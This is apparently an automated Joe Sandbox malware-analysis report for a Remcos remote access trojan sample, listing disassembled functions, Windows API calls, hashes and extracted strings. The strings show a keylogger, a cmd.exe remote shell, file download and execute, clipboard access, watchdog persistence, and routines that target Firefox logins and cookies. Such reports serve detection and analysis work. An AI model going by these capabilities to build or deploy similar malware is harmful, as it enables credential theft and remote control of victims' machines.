            • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
            • API String ID: 1529173511-1365410817
            • Opcode ID: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
            • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
            • Opcode Fuzzy Hash: faed5817389e9e1c44c9bd25bc2e5785f6855519673eedd1caaf3ae8bfa0178d
            • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

            Control-flow Graph

            APIs
            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
            • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
            • closesocket.WS2_32(?), ref: 00404E3A
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
            • String ID:
            • API String ID: 2403171778-0
            • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
            • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
            • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
            • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

            Control-flow Graph

            control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 443 445ade-445ae9 LoadLibraryExW 441->443 444 445aeb 441->444 445 445b02-445b03 FreeLibrary 442->445 446 445b09 442->446 447 445aed-445aef 443->447 444->447 445->446 448 445b0b-445b0c 446->448 447->442 449 445af1-445af8 447->449 448->440 449->448
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
            • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
            • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
            • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
            • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

            Control-flow Graph

            control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 470 445a3c-445a3f 464->470 466 445a51-445a53 465->466 468 445a55-445a63 GetProcAddress 466->468 469 445a7e-445a8c 466->469 471 445a65-445a6e call 432123 468->471 472 445a78 468->472 469->460 473 445a70-445a76 470->473 474 445a41-445a47 470->474 471->462 472->469 473->466 474->464 476 445a49 474->476 476->465
            APIs
            • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc__crt_fast_encode_pointer
            • String ID:
            • API String ID: 2279764990-0
            • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
            • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
            • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
            • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

            Control-flow Graph

            control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 486 40166f-401674 483->486 487 40168e-40168f 484->487 486->481 488 401676-401686 call 43229f 486->488 490 401691-401693 487->490 488->490
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
            • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
            • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
            • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

            Control-flow Graph

            control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 499 44d2e7-44d319 call 445fb3 498->499 504 44d31b-44d31e 499->504 504->497
            APIs
              • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
            • _free.LIBCMT ref: 0044D320
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
            • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
            • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
            • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738

            Control-flow Graph

            control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
            • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
            • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
            • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

            Control-flow Graph

            control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 530 443694-443696 522->530 524 443672-443683 RtlAllocateHeap 523->524 525 44365b-44365c 523->525 527 443685 524->527 528 44365e-443665 call 442a57 524->528 525->524 527->530 528->522 533 443667-443670 call 440480 528->533 533->522 533->524
            APIs
            • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
            • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
            • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
            • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
            APIs
            • GetCurrentProcessId.KERNEL32 ref: 00410B6B
              • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
              • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
              • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
            • CloseHandle.KERNEL32(00000000), ref: 00410BBA
            • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
            • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
            • API String ID: 3018269243-1736093966
            • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
            • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
            • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
            • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
            APIs
            • SetEvent.KERNEL32(?,?), ref: 00406D4A
            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
            • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
              • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
              • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
              • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
            • DeleteFileA.KERNEL32(?), ref: 0040768E
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
            • API String ID: 1385304114-1507758755
            • Opcode ID: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
            • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
            • Opcode Fuzzy Hash: cb2d756319963123cdc946bd025587b190db48c268333e126865797fa68f4cfa
            • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
            APIs
            • __Init_thread_footer.LIBCMT ref: 004056C6
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • __Init_thread_footer.LIBCMT ref: 00405703
            • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
            • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
            • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
            • TerminateProcess.KERNEL32(00000000), ref: 004059F7
            • CloseHandle.KERNEL32 ref: 00405A03
            • CloseHandle.KERNEL32 ref: 00405A0B
            • CloseHandle.KERNEL32 ref: 00405A1D
            • CloseHandle.KERNEL32 ref: 00405A25
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
            • String ID: SystemDrive$cmd.exe
            • API String ID: 2994406822-3633465311
            • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
            • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
            • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
            • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
            • FindClose.KERNEL32(00000000), ref: 0040AB0A
            • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
            • FindClose.KERNEL32(00000000), ref: 0040AC53
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
            • API String ID: 1164774033-3681987949
            • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
            • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
            • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
            • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
            • FindClose.KERNEL32(00000000), ref: 0040AD0A
            • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
            • FindClose.KERNEL32(00000000), ref: 0040ADF0
            • FindClose.KERNEL32(00000000), ref: 0040AE11
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$Close$File$FirstNext
            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
            • API String ID: 3527384056-432212279
            • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
            • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
            • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
            • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
            APIs
            • OpenClipboard.USER32 ref: 00414EC2
            • EmptyClipboard.USER32 ref: 00414ED0
            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
            • GlobalLock.KERNEL32(00000000), ref: 00414EF9
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
            • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
            • CloseClipboard.USER32 ref: 00414F55
            • OpenClipboard.USER32 ref: 00414F5C
            • GetClipboardData.USER32(0000000D), ref: 00414F6C
            • GlobalLock.KERNEL32(00000000), ref: 00414F75
            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
            • CloseClipboard.USER32 ref: 00414F84
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
            • String ID:
            • API String ID: 3520204547-0
            • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
            • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
            • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
            • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
            APIs
            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
            • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
            • String ID: 05#v`#v
            • API String ID: 2341273852-3697325483
            • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
            • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
            • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
            • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: 0$1$2$3$4$5$6$7
            • API String ID: 0-3177665633
            • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
            • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
            • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
            • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
            APIs
            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
            • GetLastError.KERNEL32 ref: 00418771
            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: EnumServicesStatus$ErrorLastManagerOpen
            • String ID:
            • API String ID: 3587775597-0
            • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
            • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
            • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
            • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
            APIs
            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
            • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
            • FindClose.KERNEL32(00000000), ref: 0040B3BE
            • FindClose.KERNEL32(00000000), ref: 0040B3E9
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
            • API String ID: 1164774033-405221262
            • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
            • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
            • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
            • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
            APIs
            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
            • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
            • GetLastError.KERNEL32 ref: 00409375
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
            • TranslateMessage.USER32(?), ref: 004093D2
            • DispatchMessageA.USER32(?), ref: 004093DD
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
            • String ID: Keylogger initialization failure: error $`#v
            • API String ID: 3219506041-3226811161
            • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
            • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
            • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
            • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
            APIs
              • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
            • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
            • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
            • SetLastError.KERNEL32(0000000E), ref: 0041082E
